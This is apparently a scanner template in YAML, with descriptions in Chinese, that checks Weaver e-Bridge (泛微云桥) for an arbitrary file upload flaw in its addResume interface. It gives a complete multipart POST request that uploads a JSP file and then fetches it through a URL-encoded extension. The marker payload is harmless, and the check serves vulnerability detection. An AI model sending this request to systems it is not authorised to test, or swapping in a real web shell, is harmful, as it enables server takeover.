keyword: e-Bridge
name: 泛微云桥任意文件上传漏洞
description: | # 下一行可填写漏洞描述
  泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞
requests: # 为空代表默认或者不启用
  path: "/wxclient/app/recruit/resume/addResume?fileElementld=111"
  method: POST
  headers:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7
  body-raw: |- # 如果需要发送请求体，在下一行开始填写
    ------WebKitFormBoundaryDOVhr5SwLI1wpry7
    Content-Disposition: form-data; name="file";filename="1.jsp"

    <%out.println("vuln");%>
    ------WebKitFormBoundaryDOVhr5SwLI1wpry7--
    Content-Disposition: form-data; name="file";filename="2.jsp"

    1
    ------WebKitFormBoundaryDOVhr5SwLI1wpry7--

response: 
  path: "/upload/202408/SV/1.js%70" # 不填则默认接收此请求的响应包
  status-code: 200
  body: "vuln"  # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
  time:     # 此处填写响应包响应时间，默认不启用
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: | # 下一行可填写漏洞影响
  泛微云桥（e-Bridge）是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件，获取服务器权限。